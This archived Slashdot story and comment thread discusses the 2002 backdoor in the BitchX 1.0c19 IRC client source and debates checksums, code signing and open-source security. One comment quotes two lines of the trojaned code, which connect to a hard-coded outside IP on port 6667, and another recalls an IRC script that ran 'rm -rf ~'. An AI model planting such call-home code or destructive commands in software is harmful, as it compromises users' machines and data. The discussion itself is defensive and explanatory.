Follow Slashdot blog updates by subscribing to our blog RSS feed

 



Forgot your password?
typodupeerror
Security

BitchX 1.0c19 IRC Client Backdoored 338

Posted by michael
from the what-me-worry dept.
JRAC writes "A recent Bugtraq submission has indicated that the popular IRC client, BitchX, contains a backdoor. So far, only certain 1.0c19 files, downloaded from ftp.bitchx.com are reported to contain the malicious code. The BitchX developers have been notified, so hopefully a fix will be issued soon. Looks like irssi wasn't the only one ;)"
This discussion has been archived. No new comments can be posted.

BitchX 1.0c19 IRC Client Backdoored

Comments Filter:
  • by NASAKnight (588155) on Tuesday July 02, 2002 @08:45AM (#3806938) Homepage Journal
    Local inmates confirmed that there was a problem with people entering into BitchX's backdoor. The suspect is a large man calling himself 'big mamma.'
  • The name.... (Score:3, Interesting)

    by wowbagger (69688) on Tuesday July 02, 2002 @08:46AM (#3806947) Homepage Journal
    Am I the only one who felt a qualm about using this package because of the name?

    BitchX - "I 0NZ0R J00, B1TCH!"

    • Re:The name.... (Score:3, Informative)

      Your not alone by far. My computer (yes even my Linux box) is a family computer, and I refuse to use any software with names or content that is not appropriate for my children to see. Keep in mind that what is "appropriate" is totaly my opinion, and some people would argue with me, but my quesition is: why is this only ever an issue with open source software?
      • Re:The name.... (Score:3, Insightful)

        by dalassa (204012)
        Because most companies have marketing people to hit them on the head and say no, this is not appropiate.
      • Open source only? (Score:2, Interesting)

        by EvilFrog (559066)
        The naming thing isn't necessarily an open source issue, more of a "started by one guy working out of his house who's got a messed up sense of humor and is giving the software away for free so he doesn't have to worry about sales" issue. The same thing comes up whether it's open or closed.

        The popular emulator Dos/Windows "Nesticle" comes to mind.
      • BitchX also sends out somewhat crude messages to the IRC channels you're currently on when you /quit the application. Whilst I've no doubt you can turn that feature off, I dislike it greatly. If I choose to use rude, crude and/or lewd language on IRC that's my business (and I do so sometimes), but the mentality that it's a sensible default for a computer to mouth off publically on your behalf makes me wonder about the maturity of the developers, and thus the quality of the software itself. It's one of the major reasons I use an alternative IRC client.

        This is only an issue with OSS because they are often the product of one person, unfettered by marketing departments and financial considerations. Sometimes this is good (honest disclosure of a programs bugs and limitations, and realistic schedules for new versions such as "when it's done"), and sometimes this is not so good (you get juvenalia like BitchX, which aside from its bad habits seems to be a full-featured, powerful IRC client).

    • What I found funny was:

      BitchX backdoored
  • Most interesting... (Score:5, Interesting)

    by phreak404 (241139) on Tuesday July 02, 2002 @08:47AM (#3806961)
    Is that when the vulnerability was first submitted they also submitted some interesting finds about the ftp server on BitchX.com serving trojaned and clean versions, depending on the originating IP, demonstrating that the server had been 0wned (more than likely).

    Sad that the developers didn't notice sooner, and it makes you wonder how many boxes have now additionally been 0wned because of this.
  • Who's this? (Score:5, Informative)

    by Draoi (99421) <.moc.cam. .ta. .thcoiard.> on Tuesday July 02, 2002 @08:48AM (#3806966)
    There's an interesting IP address hard-coded into the trojaned code;

    + sa.sin_port = htons (6667);
    + sa.sin_addr.s_addr = inet_addr ("213.77.115.17"); alarm (10);
    Doing a reverse-DNS lookup gives;
    ;; QUERY SECTION:
    ;; 17.115.77.213.in-addr.arpa, type = ANY, class = IN

    ;; ANSWER SECTION:
    17.115.77.213.in-addr.arpa. 1H IN PTR wenus.dtcomsa.com.
    .... so who are they??
    • Probably the owners of another rooted box...
      • True. At least it's a start - shutdown whatever's collecting data on port 6667 on the 0wn3d box & it'll stop the snoop ....
    • Re:Who's this? (Score:4, Informative)

      by zdzichu (100333) <zdzichu @ i r c .pl> on Tuesday July 02, 2002 @08:52AM (#3807001) Homepage Journal
      inetnum 213.77.115.0 - 213.77.115.255
      netname DATACOM
      descr Datacom
      descr Warszawa Bemowo
      country PL
      admin-c AW7760-RIPE
      tech-c RW7118-RIPE
      status ASSIGNED PA
      mnt-by AS5617-MNT
      changed tkielb@cst.tpsa.pl 20000915
      source RIPE

      (stupidly formatted because of lamefilter)
      • Hey. That's interesting.

        I've been getting SSH scans from a Polish ISP right this week. I don't run BitchX (I use X-Chat), but a backdoor discovered with a Polish IP hardcoded in, and an increase in script kiddie activity from Poland in the same week doesn't sound like a coincidence to me.

        Mart
    • so who are they??

      set:/ # host 213.77.115.17

      17.115.77.213.IN-ADDR.ARPA domain name pointer wenus.dtcomsa.com


      That wasn't so hard. but if you want, you can find out more [netsol.com].

      Geesh, these tools are just stitting there waiting to be used...
  • It's Odd (Score:3, Interesting)

    by Copperhead (187748) <talbrech@@@speakeasy...net> on Tuesday July 02, 2002 @08:48AM (#3806969) Homepage
    According to the bugtraq post, when you downloaded the file, sometimes you received the backdoored version, and other times you didn't.

    From the post, "There is something very strange going on with the FTP server on ftp.bitchx.org. In some cases, it serves up the trojaned version; in others, the original, safe version. It seems to be client / client-behavior based (we're not sure exactly what)."

    The post continues, "To add a little more to this; we've confirmed that if you come off of what appears to be a cablemodem/dsl IP you are likely to get a trojan'd copy. If you come off of a more static link, you are likely to get a clean copy."

    Very strange.

    • I'm on a cablemodem and I tried getting the trojaned version hours after this was discovered. Apparently, the ftp server was fixed as I tried from multiple IP addresses and ways... Fortunately, I happened to have the tarball that I compiled from and the md5sum matched the good version.

      Moral of the story: *always* check md5sums, or use a packaging system that always checks it for you. Doesn't rpm automatically do this? Gentoo's portage does.
      • If the ftp server was rooted, why couldn't they just replace the md5 sums? Usually I see them as files in the same directory as the tarballs. How hard is it to generate an md5 sum which matches the hacked version?
        • Re:It's Odd (Score:3, Insightful)

          by mindstrm (20013)
          Well, perhaps they wanted to spread it to dumb home users but not to anyone more professional. Perhaps they wanted to go longer without being caught.

          Perhaps it's actually a DNS issues, and it's directing some people to a dummy server.
        • I was under the impression that most people signed MD5SUMS files with PGP/GPG. I know I do.
      • Re:It's Odd (Score:3, Informative)

        by frozenray (308282)
        A user named uid0 made an excellent point in an usenet thread about the backdoored dsniff/fragroute/fragrouter utilities on monkey.org:

        This makes one wonder a question that would be best posed to the community; the purpose of MD5/SHA/etc is to provide unequivocal evidence as to the validity of a piece of data. More often than not, such files are kept in the same, vulnerable, location as the actual data. Clearly one can see the downfall of such a system.

        (source [google.com])
        • The intent as I have seen it is that the MD5 sum comes from a different source than the thing being verified. For example in the portage system the md5sums are part of the tree, and distfiles are checked against those on download. Not the most ideal security, but it is a little more resiliant than putting them in one spot, that would just be pointless.

          So long as there are a concentrated, trusted, experienced few through which things are distributed, then gnupg could be employed to sign files and have those distribution masters public keys distributed with a distro. Problem here is that source files come from soooo many different maintainers that there would be as many public keys as packages. Of course with gentoo, instead of the 'portage masters' running md5sums, they could run this sort of signature, so that more permament public key would be around to verify files rather than a single vulnerable md5sum.... At that point there would then be three increasingly difficult levels to compromise to fool the system...
    • Actually, it makes perfect sense...

      If you were planning a DDOS attack, you'd want to make sure that people on fast but dynamic links (ie home users on cable/dsl who might not have good security) would be the ones to report into the 'home' ip..

      that way, the person who trojaned bitchx would have access to a number of perfect, 'safe', but nice and high-speed clients for doing whatever they want to anyone, with reduced chances of the victims (the backdoored people at least) noticing.

      only serving the trojaned versions to people who fit that description might have been a way to try and keep the backdoor 'low profile' .. the fewer people who get the backdoored version, the less chance of it becoming public. although, obviously in this case it didn't work very well..

      anyway, tiz just an idea.

  • by MattW (97290) <matt@ender.com> on Tuesday July 02, 2002 @08:49AM (#3806972) Homepage
    This reminds me of the good old days, when people distributed like 20 different scripts for the irc2 client, all of which had some backdoor or another. Most of them listened for ctcp commands and would pass them directly to shell. CTCP GROK JUPE CMD ORD -- bonus points to anyone who can name all 4 scripts that had those backdoor commands. Then there were amusing tidbits like scripts that would flood anyone using the authors nick without the right hostmask. Then there was the 'Folder's Crystals' script -- it set your display to off, so you saw nothing even while you joined a channel and were saying, "I've just had all my files secretly replaced by folgers_crystals... let's see what happens!" (meanwhile, the script was executing rm -rf ~).

    Of course, back then, you could blame people for running something they didn't understand, since it was on the order of getting a whack-a-bill game by email and just running it, whereas tainted downloads aren't quite as shameful, but ah, it does bring back the memories of the Wild Days of irc...
  • by XaXXon (202882) <xaxxon@@@gmail...com> on Tuesday July 02, 2002 @08:50AM (#3806977) Homepage
    If BitchX was some sort of closed-source product, how long might this have taken to show up? Many eyes lock down all backdoors.

    Anti-GPL people (read Microsoft and their lackies) may try and take this as a weakness in OSS, but I look at it as a strength. If one of their developers gets something like this into one of their products (either on his/her own or with the blessing of the company, the world may never know). With OSS, it's out in the open for everyone to see/fix.
    • by toupsie (88295) on Tuesday July 02, 2002 @08:59AM (#3807042) Homepage
      If BitchX was some sort of closed-source product, how long might this have taken to show up? Many eyes lock down all backdoors.

      Not to burst your bubble, but if BitchX was closed source, I doubt a third party would have access to the source code to inject the trojaned backdoor, modify the FTP server and set up a bizarre distribution method (has anyone figured this out yet?). Granted many eyes helped find this problem, but in a closed source world, this wouldn't happen unless you had a disgruntled employee or a really stupid project manager. If BitchX were a commercial, closed source product, the exploit would most likely be a buffer overflow, not a blatant backdoor.

      Disclaimer: I use a closed source IRC product called, Ircle [ircle.com].

      • Not to burst your bubble, but if BitchX was closed source, I doubt a third party would have access to the source code to inject the trojaned backdoor

        I guess the only backdoors in MS software are the ones the developers put there ;)
        • I guess the only backdoors in MS software are the ones the developers put there ;)

          Exactly! Check out this post [slashdot.org] in the same thread. I mentioned exactly this problem!!!

          • I thought that was humor.

            You do know about binary patches, I trust. Backdoors don't require access to the source code. Not if you're good at assembler. (I'm not, but I've had to do binary patches on a couple of mainframe programs a few decades ago.)

            Still, when I first started working with computers binary patches were one of the common changes made to working programs. True, they were small. But with a compiler to generate the binary, all you need to do is patch in a jump to your code, and then a jump back afterwards.

            Perhaps things have really changed in ways that I didn't catch after dropping assembler. If so I'm sure someone will let me know just how stupid I'm being. But I doubt it.
      • Wasn't this supposed backdoor in the ./configure script and not the finished executable proper? Or was linked into the executable but not part of the original code of BitchX?

        If so that would make it a viral type infection rather than an error or backdoor in the original BitchX code.
      • Not to burst your bubble, but if BitchX was closed source, I doubt a third party would have access to the source code to inject the trojaned backdoor, modify the FTP server and set up a bizarre distribution method (has anyone figured this out yet?). Granted many eyes helped find this problem, but in a closed source world, this wouldn't happen unless you had a disgruntled employee or a really stupid project manager. If BitchX were a commercial, closed source product, the exploit would most likely be a buffer overflow, not a blatant backdoor.

        Are you seriously claiming that it is not possible to modify a binary? It is only slightly more difficult than modifying the source, and if you are doing it for the purposes of spreading backdoored software, the small difference in difficulty is not relevant at all.

        • Are you seriously claiming that it is not possible to modify a binary? It is only slightly more difficult than modifying the source, and if you are doing it for the purposes of spreading backdoored software, the small difference in difficulty is not relevant at all.

          Yes, I am seriously saying that a third party would not modify the binary, give it back to the Software Publisher and have the Software Publisher redistribute the modified binary to the public through their corporate FTP server.

          Did you think about your comment before you typed it? Or did you fail to read my original comment. It makes no sense what-so-ever what you typed.

          • Yes, I am seriously saying that a third party would not modify the binary, give it back to the Software Publisher and have the Software Publisher redistribute the modified binary to the public through their corporate FTP server.

            Surely the availability of source has nothing to do with the security of an FTP server or the entire network (including DNS) between you and the FTP server.

          • Yes, I am seriously saying that a third party would not modify the binary, give it back to the Software Publisher and have the Software Publisher redistribute the modified binary to the public through their corporate FTP server.

            Then you are seriously deluded. Did YOU even read your comment, because what you are saying is complete and utter nonsense.

            This guy didn't offer it as a patch which was then incorporated into BitchX. The software was modified, the FTP server distributing the software was rooted, the software replaced with the backdoored software (obviously in a sophisticated enough manner to evade casual inspection of the server), and people downloaded it.

            Binaries are an even more useful tool for distributing back doors, because it's even harder to notice, and those as blind to this avenue of attack as you appear to be will cheerfully run these back-doored binaries, believing erroneously that because it is a binary, it's safe. You couldn't be more wrong, and I hope you're never subject to the consequenses of your blindness in this area in the future.
      • what makes you think the source wouldn't be on the same machine the ftp server runs on? (I've seen much worse at closed source shops)
        If they had rooted the machine they _would_ have access to the source, but no white hats would.

      • Not to burst your bubble, but if BitchX was closed source, I doubt a third party would have access to the source code to inject the trojaned backdoor

        Right. Because viruses *never* hijack the functionality of closed-source software. Computer viruses only make open-source programs malfunction.

    • > With OSS, it's out in the open for everyone to see/fix.

      Not really. [acm.org]

    • by torinth (216077) on Tuesday July 02, 2002 @09:32AM (#3807212) Homepage
      If BitchX was some sort of closed-source product, how long might this have taken to show up? Many eyes lock down all backdoors.

      Anti-GPL people (read Microsoft and their lackies) may try and take this as a weakness in OSS, but I look at it as a strength. If one of their developers gets something like this into one of their products (either on his/her own or with the blessing of the company, the world may never know). With OSS, it's out in the open for everyone to see/fix.


      Please. It's open for everyone who has nothing better to do than read slashdot or bugtraq, maybe. What much of OSS needs but doesn't have is strict maintainers, who know what contributions are made to the product and know what they'll do before they're let in. Fortunately, some of the bigger projects have this (Linux kernel, *BSD, Mozilla), but alot of OSS today is about people being too lazy or incompetent to double check some 15-year-old hax0r's crappy-ass contribution until it's too late.

      The other thing OSS needs to enforce a little better is something along the lines of code signing. From what I can tell, it looks like somebody hijacked the bitchx FTP domain on some routes and is returning trojaned copies to the downloaders who are going through it. This is a weakness of OSS. It's much easier for me to grab a piece of Open Source software, drop some malicious code in it, and redistribute it from a hijacked domain than it is for me to do so with something I don't have the source to. Granted, it's still possible, if I inject code into the compiled version, but it's a hell of a lot easier to do it with source.

      The simplest move is to use MD5's for major releases and have some 3rd-party location to verify them. Freshmeat? Sourceforge? This, at least, could add some security, and would a central point for people to watch out for hijacking...

      Get your head out of the damned OSS-as-a-religion sand and look at what needs to be done to make it viable to people who don't fuck around reading about the next idiot to shoot himself into space in a backyard rocket.

      Meh. Enough ranting, for now.

      -Andrew
    • Not sure but on my non OSS operating system I run firewalls and intrusion detection software to help me catch spyware and other things which are accessing ports which I am not aware of. Since I'm not the only one who does this I would think the backdoor would be found. You don't have to see the source code to find holes if you can see the holes.

      Frankly I am quite tired of this common belief that thousands of eyes are constantly scanning OSS looking for problems to fix. In the 9 or so years I have been using Linux and GNU software I have never looked for such things. Maybe that is because I am a developer and spend enough time with my code. Even when I first started with Linux and things like CDROM and NICs required patching and compiling I was content with the code I was downloading. Hobbiests tended not to screw other hobbiests (unless money is changing hands) and I tend to still believe that. I really doubt there are that many people who police code. If you are working on something and notice a problem then you submit a patch but the belief of a huge and constant code review going on is a false one as far as I am concerned.

      With the popularity of Linux and free software however and the perceived threat to some commercial software it might be wise for OSS project leaders to be extra careful of new code that slips in. I have belived for a while that sooner or later we will see companies like Microsoft or Sun let slip some pattented code into a free software project just so they can come back later and shut it down with a lawsuit. Face it, these companies are getting hurt. A project like Mono has the potential to hurt .Net and if successful hurt Java. I would not have thought that someone would slip in a backdoor into a project however.

      Anyway, I don't think you can look at OSS or a closed source project and say one is more "secure" than the other. I think it really comes down to how it is managed and the quality of the people who are contributing. You might also want to consider they type of application.

      As far as IRC goes, this is a community where you are judged by how "bad-ass" your kick scripts are and your "l33t h4xx0r" skills. I'd be cautious of any IRC tool I used for that matter.
      • True, not all bugs are shallow. And many projects are almost desperately looking for more developers -- which is a scary sign.

        But the way I figure it, new developers have their software scrutinized more closely so you'd figure that someone joining just to mess things up wouldn't ever be really trusted.

        Not that this rules out an entire project whose purpose is simply to release a trojan. Which is why it is a good idea to check the mailing list archives and IRC channels first.

        I know Debian uses package signing. Many other distributions do the same thing.

        So safeguards are in place -- its just there's nothing full-proof about them.
        • I know Debian uses package signing. Many other distributions do the same thing.

          Internally, yes, but users can't verify packages...yet. AFAIK, the plan is to go forward with integrating debsig-verify after woody's release.

      • The difference:

        When your closed-source OSes firewall alerts you to a problem, can you find it? Can you fix it?

        Now, when this happens on an open-source OS, can you find and fix it?

        BitchX certainly isn't a critical application. But what if this was your web server? Do you wait until your vendor can supply you a fix, or would you (as a developer) rather tear into the code and fix it in a few minutes?

        That's the big difference. Its not just in the detection, but also in the speed of repair and availability of a fix.

        IMHO, closed-source software is simply not on the ball when it comes to getting patches out within a reasonable amount of time (which, to me, is under 24 hours of being alerted for a critical application). At least with open-source, if the vendor won't help you, you can at least help yourself.
        • Probably only one in 10,000 people running apache could have found OR fixed that last root expoit on their own machine. So for 9,999 people open source doesn't matter at all.

          What the hell do you think source is anyway. Have YOU ever looked at it? That any person can just "look" at it and go "Oh, here it is, I'll just fix it here. There done."

          Apache had to fix that bug. And it wasn't in a day either, it took neary a week. Other people hacked at it. DIDN'T FIX IT, but SAID they did and tried distributing a broken patch. HORRAY OPEN SOURCE!

          We had to wait for the vendor to patch. Just like closed source. Code is generally FAR too complicated for anyone not familiar with it to just start hacking away at a "fix". Especially a "Security fix", which would require full regression testing to make sure the product still works as advertised and that the fix actually worked.

          • >Probably only one in 10,000 people running apache could have found OR fixed that last root expoit on their own machine.

            Perhaps so, but if a program were making a connection of a specific port, how hard would a:

            grep -r [port number] *

            really be?

            I would suggest that for many problems, especially backdoors (however, certainly not all) the fix should be obvious to anyone who has read a book on C.

            >Have YOU ever looked at it?

            I've not contracted a problem similar to the BitchX one, and others tend to be patched fast enough its not a problem.

            However, if I did see this activity that the backdoored BitchX causes, I would have certainly teared into the source.

            Like a surprising many other people. I only look at the source when I need to. But if I couldn't on those occasions when I needed to, I'd be sunk, or at least very disappointed.

            >And it wasn't in a day either, it took neary a week.

            That's why you have the source. Need a patch faster?

            FIX IT YOURSELF!

            >Other people hacked at it. DIDN'T FIX IT, but SAID they did and tried distributing a broken patch. HORRAY OPEN SOURCE!

            If you're a moron who runs patches from random people thinking that's your fix, well, guess what! That's as dumb as running cracks on windows programs to bypass time limits! Don't come running to me when you do idiotic things.

            >We had to wait for the vendor to patch.

            Only because either your company was to friggin' lame to have an in-house coder, or the program wasn't that important to you.

            My whole point, which you have failed miserably to disprove, is that you can fix open source software yourself if the vendor fails you. If you choose not to do so, that's your problem, not mine.

            >Code is generally FAR too complicated for anyone not familiar with it to just start hacking away at a "fix"

            Either hire competent coders, or don't fix the problem, but instead disable it.

            Disabling a problem might leave you missing features, but its a hell of a lot easier, and a hell of a lot better than the closed source alternative of simply not running the program at all.

            Case-in-point: Apache can have the problem disabled with a simple config hack if you weren't competent enough to have proper programmers to repair the problem properly.

            In short, don't blame open source for your company's/government's incompetence. And if it isn't for a company/government, I doubt that turning off the service for a week will seriously impede your way of life.
    • Anti-GPL people (read Microsoft and their lackies) may try and take this as a weakness in OSS,

      Some of us despise the GPL and love open source. Please don't incorrectly associate the two. It may reinforce the popular idea that the GPL is the guardian of everyone and that those who submit to the will of RMS will be saved, but it does nothing but confuse people and obscure the truth. It's no better than saying "People who don't like Microsoft (Mac users) tend to be computer illiterate weenies."

  • ... that Linux is gaining popularity among the crackers. This scenario is well known and has been explained for years. But it remained largelly theoretical until this year, it seems to me.

    So, now we can expect people that mostly ignored us to come and crack our servers, install backdoors into our releases. They're probably going to write better viruses, too. I guess this is the price you pay when you become mainstream.

    For years we've told the world how secure our OS was. Err, could be, once configured properly. The time has come, now, to do this.
    • Mostly ignored?? What planet have you been on for the past several years?

      Linux has never been ignored and it can actually be a more desireable breakin from a kiddy prespective since it's much easier to make use of a broken Linux/unix box thanks to the inherent flexability and added bragging abillity to have broken something widely thought to be more secure.

      I see regular scans on my servers for wuftpd telnet and open bsd's ftp spectific holes. In fact last year I realised I hadn't secured a freebsd install while I was on the bus home. The next day I rushed in to secure but it was already rooted.(thankfully nothing installed yet)

      Running Linux, Freebsd or even OpenBSD has *never* been an excuse for slacking off on keeping servers updated/secured.

  • Backdoor. (Score:4, Interesting)

    by ldopa1 (465624) on Tuesday July 02, 2002 @08:53AM (#3807007) Homepage Journal
    Is this truly suprising? With the proliferation of "secret" functionality in everything from DVD's [dvdeastereggs.com] to Palm applications [palmlife.com], it seems that a lot of developers take great delight in doing something "on the sly" that will get them noticed.

    While the vast majority of these "easter eggs" are completely harmless, it's only logical to assume that they present an opportunity for malicous activities. I mean, who among us doesn't have SOME "H4X0R" history? Doesn't it follow that some of that will come out when the opportunity to put in a "gift" presents itself?

    Also, this seems to me to be one of the down sides of the Open Source fight. Most of the accomplished hackers that I know are strong advocates of Open Source. It leads me to believe that most of the proponents of Open Source are or were at some time at least a script kiddie with delusions of grandeur.

    Nobody I know has the time to actually check every line of code in a 200 Meg build for one or two lines of backdoor code, especially when the application is DESIGNED to make and break connections.

    • Re:Backdoor. (Score:2, Interesting)

      by numatrix (242325)
      This was not the developers doing something sly. There have been a recent rash of compromised servers hosting different pieces of software, and then backdoors being configured in a similar manner in the ./configure script as described in this post. Similarly hit was monkey.org [monkey.org] where some of dug song's security tools were compromised. Google cache of dug's post [216.239.37.100].

      There was another relatively famous piece of software compromised the same way recently as well. Somebody is going through some great lengths to put backdoors in the source of some good OSS. Makes you wonder how much is being missed.
    • Re:Backdoor. (Score:3, Insightful)

      by kmellis (442405)
      This is the real security threat for everyone, particularly anyone with sensitive data.

      Viruses and worms have been mostly merely malicious. Same with cracking. And the malice involved is not very great. But what if people get serious about stealing data?

      A few years ago I had an epiphany one night, and waltzed into a network security company the next day.

      "Look", sez me, "Inbound connections and activity are, in the long run, not going to be the real threat. The real threat is trojaned applications that mine for data and somehow send it offsite. You need to be monitoring outbound activity for appropriateness. For example, eventually you're going to see corporate espionage where someone writes an attractive and actually useful little app, then social engineers a targeted person within an organization to download it and compromise security. This is just an example of the general problem."

      They were actually pretty impressed, but the company's strategy was deliberately to avoid concerning itself with viruses or worms (more specifically, they wanted to stay only on the servers, monitoring network activity in a sophisticated manner). But it seemed to me that this was a natural extension of their product and technology. And they thought I was a pretty bright guy, but they didn't know what to do with me. Well, anyway. The irony is that they were only a year or so later bought by one of the big antivirus firms, mostly just to acquire their technology.

      In this particular case, the BitchX irc app, it looks like an outside source injected some backdoor code into the application, and hacked the ftp server to distribute it in a selective manner, presumably to help lower the risk of detection. A lot of effort for not that great of a payoff, really. Here, as is often the case, it's mostly about proving how clever you are.

      But we're starting to see rudimentary examples of what I was warning about with spyware and other apps that make outbound connections that are in some sense illicit. Firewalls monitoring outbound connections can only be so successful given that they're always going to let some through. I know that some of the client based firewalling/monitoring software looks at connections on a per application basis. That's a start.

      Personally, my inclination is that we need a networking monitor that operates like a virus scanner -- on the client, in the background -- that accesses a secured database of allowed application to outbound connection mapping, with secured handling of exceptions or new applications referred to a security admin (ideally) or an admin. This way we don't have to use a brute-force approach that simply locks down all allowed applications and allowed outbound connections in a non-specific, usability-destroying way.

      But whatever the solution, I have little doubt that this will be a growing problem which will make a transition from script-kiddie nuisance cracking to something much more sophisticated. Although I could be wrong.

  • by Cyclops (1852) <(rms) (at) (1407.org)> on Tuesday July 02, 2002 @08:54AM (#3807009) Homepage
    Many don't digitally sign their sources with a secure key, and thus there is absolutely no way to verify that those sources are the ones the developer intended to release.

    Many think that a simple md5sum alongside the sources is enough. IT IS NOT. Any attacker who replaces the sources can as easily replace the md5sum, which can be generated by anyone.

    A digital signature (I suggest using gpg) can only be generated by YOU if you keep it in a secure place, and use it to sign the sources. The public side of this key should be widely distributed and preferably signed (that is recognized) by third parties... the most trustworthy these third parties can be, the better.

    After the huge attack on the network where such sites as Apache were hosted, other Apache projects which did not sign their packages suddenly started signing them. They got scared. You should be too.

    A lot of people instinctively trust their dns resolutions (oops) and also think that if they go to http://www.mozilla.org they will get their favorite browser for sure. They are also wrong. dns can be spoofed under certain conditions, so they could be going to crackersR.us instead, and downloading a neat trojaned source, for instance.

    The more a project grows in fame, the more it will become a likely target for these kinds of attacks, so the more need to a degree of responsability that should not be needed, but it unfourtunately is since the danger is ubiquitous.

    Be carefull, be very carefull.

    Also avoid using user root period.
    • I am signing all my sources with GnuPG. However, the problem is that it is not enought to verify the signature - if you want to trust signed source, you would also need to verify the key (fingerprint), and according to my experience, almost nobody does that, presumably out of lazyness.
  • by splorf (569185) on Tuesday July 02, 2002 @08:58AM (#3807032)
    I'm sorry but this is one thing Microsoft and/or Netscape did right. The practice of including detached PGP signatures on download sites is useless--they have to be manually verified, and hardly anyone bothers.

    GNU/Linux downloads should be in signed archives like Netscape JAR files. JAR files are basically ZIP archives with a signature file stored inside the .zip in a standard place. When you unpack the archive, the unpacker checks the signature the same way a browser checks an SSL web site.

    JAR files use a certificate chain ending in a certificate authority (usually a commercial one) but maybe the signed-download scheme could be signed against a certificate on the official developer's website. Of course that wouldn't be unspoofable, but it would be as secure as the current scheme of having a PGP public key on the developer website and signing against that. The main benefit is the checking would happen automatically, so it would be much harder to put crap into downloads. If someone makes a modified version, they would have to sign it themselves (with a signature pointing back to their own website) or else the unpacker would print a message saying the code was unsigned and the user should check it carefully before using it.

    • RPM does this, and most rpm managers do exactly this (red-carpet for instance). I bet debian has the same type of protection. If you only install software from trusted distributors, you should be fine.
    • Valid point, but saying 'GNU/Linux' needs this is *way* too broad of a topic to address. That's not much more helpful than saying 'computer oses need signed download' (here comes Palladium...).

      GNU/Linux, and *any* OS for that matter has the potential to provide for this sort of thing. the GNU/Linux layers (the kernel and basic system utilities) are too low a level too require this stuff. The difference of doing it by hand as opposed to doing it with a yes/no dialog is simply a matter of a simple utility integrated into a distribution and some signatures/public keys distributed in advanced through a trusted channel. In some form or another, it is already in place for a lot of things.

      For example, I use gentoo and *always* install through the portage system. The portage tree includes ebuild build description and md5sums for the ditribution files. This requires an attacker go in and compromise the portage tree and also provide/hijack distribution files for that package. Not perfect but not too shabby. The emerge process always checks MD5s.

      I'm not sure if apt-get, urpmi, apt-rpm, or the FreeBSD ports systems do this, but even if they didn't it wouldn't be a huge leap to add this functionality.

      Perhaps the better thing to come away from this knowing is that sometimes using package management holds the answer. Sure you can download and check signatures manually, but many don't and so having a package distribution system that forces the issue can slow issues like these drastically..
    • RPM, the standard packaging system according to the Linux Standards base, had support for PGP (IIRC) around three years ago. This was replaced / upgraded to GPG a couple of years ago. Every package in Red Hat Linux (and most other popular distros) is signed (unless someone screws up - there was a case where 2 packages weren't properly signed, but signed replacements were made avaliable soon after). RPM will print a strong warning if the signature isn't correct (and maybe fail the operation - dunno, my signature's have always been correct).

      Dpkg also recently added GPG support, buy you have to trust individuals rather than a specific company - no packager is going to lose their job if they're working in Albania on Debian trojaning packages.
  • Enough talk (Score:3, Funny)

    by WildBeast (189336) on Tuesday July 02, 2002 @09:18AM (#3807138) Journal
    Grow up, nothing is perfectly secure. Let's stop arguing which OS is vulnerable and find the evil do-ers who did this. Let's smoke them out from there parents basement and deliver a Slashdot can of whoop ass.
  • . . . you wouldn't be vulnerable to back doors inserted by rogue programmers in configure scripts. You would only be vulnerable to back doors authorized by Microsoft and the U.S. Government to prevent piracy and terrorism.
  • GnuPG (Score:2, Insightful)

    by giminy (94188)
    If more people used GnuPG [gnupg.org] and checked the signatures on their software, we wouldn't have to worry as much about backdoored software (assuming, of course, that you trust the original author. And if you don't, then you shouldn't be using their software now should you?). One of these days someone is going to do something like this with something major, like the kernel, and it's going to affect a lot of people. So start checking now!
  • by teslatug (543527)
    Finally vindication for all those who made fun of me for using XChat...
  • Backdoored? (Score:3, Funny)

    by Per Wigren (5315) on Tuesday July 02, 2002 @10:38AM (#3807647) Homepage
    Isn't it the BitchX who is supposed to be backdoored, not her client?

  • by Animats (122034) on Tuesday July 02, 2002 @11:37AM (#3808048) Homepage
    IRC clients are a good place to start on security, because they need very limited access on the client machine. So put the client in a FreeBSD jail. All it needs to talk to is its window and the net, and maybe a few specific files.

    Jailing a browser is tougher, but an IRC client should be easy. Somebody who's into IRC and security should do this as a demo.

    • by Junta (36770) on Tuesday July 02, 2002 @12:01PM (#3808245)
      Actually, I would say both are equally 'tough' to jail. Access to the network is pretty much the same, both tend to use particular, specific ports but circumstances can require just about anything, though IRC tends to deviate less than web browsers do from the standard ports, they still deviate.

      As far as file system access, neither *truly* require write access to the disk nor read access to nothing more than a few config files. I know, browsers tend to use disk as cache and you want to download using your browser as well, but same goes for IRC, a large portion of users exchange files through the IRC client with the intent of the transferred file not being transient. For those who want to have non-transient downloads (and ability to save configuration, both sorts of clients equally likely to require this), chroot is as far as I would go.

      Strictly speaking, all network applications have similar issues. While it may appear easy to pinpoint required operations of a piece of software, there are always enough deviations to make it not 100% possible to tighten it all down. The only place where you can really predict and jail based on those predictions what a network application needs to do and access is on the server end where you have the most control over how the network is used. Clients having to interoperate with oddball server configurations and users who want to use the software in different ways will always make the jailing you describe less feasible.

      Of course, most any app could run fine in a chrooted environment if you have the disk space for the requisite libraries, and that by itself greatly reduces (but doesn't eliminate) threats to data outside the chroot jail.
      • While it may appear easy to pinpoint required operations of a piece of software, there are always enough deviations to make it not 100% possible to tighten it all down.

        That assumes you don't modify the client. I'm proposing that the clients be modified to live within tight security restrictions. The general idea is that you put the app in a restricted environment and fix the app until it works there. Maybe some features won't work; those are turned off.

        The Unix/Linux world needs to make this work, as their response to Palladium. This is real security, not just signing and authentication.

        Something like LOMAC may be helpful here. Systrace is useful to find what needs to be fixed in apps, but that approach doesn't result in a policy without holes.

        IRC clients are a good place to start because 1) they get attacked quite a bit, and 2) they're not as big as browsers.

    • Take a look at: Systrace [umich.edu]
  • Look kids... (Score:4, Insightful)

    by ice-man_efnet (589707) on Tuesday July 02, 2002 @12:22PM (#3808407)
    The developers of BitchX did *NOT* put malicious code in the source. For one thing, there were two versions of the 1.0c19 source running around. It also seems that the security on *.bitchx.org was never even compromised. The problem lies somewhere with a 'man-in-the-middle' changing some DNS aliases somehow. This is why some people were able to download the real version that was actually released, and some people got the 'hacked' copy.

    Also, even though the box doesn't appear to be compromised, it could happen. I hope one of you kids out there is the first one attacked when a new apache or ssh bug is found. You can never be completely secure, especially when you are running anonymous servers for people to download programs.

    kthx.

    ice-man@efnet.

  • If I were interested in rooting a lot of machines, I might do it kind of like this:

    Waste many months of otherwise useful time writing an IRC client. Make sure it gets really popular by adding neato colors. Oh, and give it a name that's sure to offend my mother.

    Wait until everyone trusts me, then throw something slightly more interesting into the mix. Like a blatant back door. Hope no one notices.

    Screw with my FTP server and make it looked hacked, to ensure deniability.

    Assume global emperorship.

